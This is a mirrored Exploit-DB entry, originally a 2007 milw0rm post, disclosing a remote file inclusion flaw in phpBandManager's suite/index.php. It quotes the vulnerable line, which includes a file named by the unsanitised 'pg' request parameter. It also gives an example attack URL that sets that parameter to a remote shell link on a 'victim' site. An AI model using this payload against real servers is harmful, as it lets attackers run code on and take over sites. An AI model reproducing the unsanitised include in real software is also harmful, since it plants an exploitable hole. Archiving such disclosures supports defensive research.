exploit-db-mirror/platforms/php/webapps/3802.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

17 lines
289 B
Text
Executable file

author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager
allow_url_fopen:on or register_globals:on
vuln;
/bandmanager/suite/index.php
include($_GET['pg'].".php");
example;
http://www.victim.com/suite/index.php?pg=shell link?
# milw0rm.com [2007-04-26]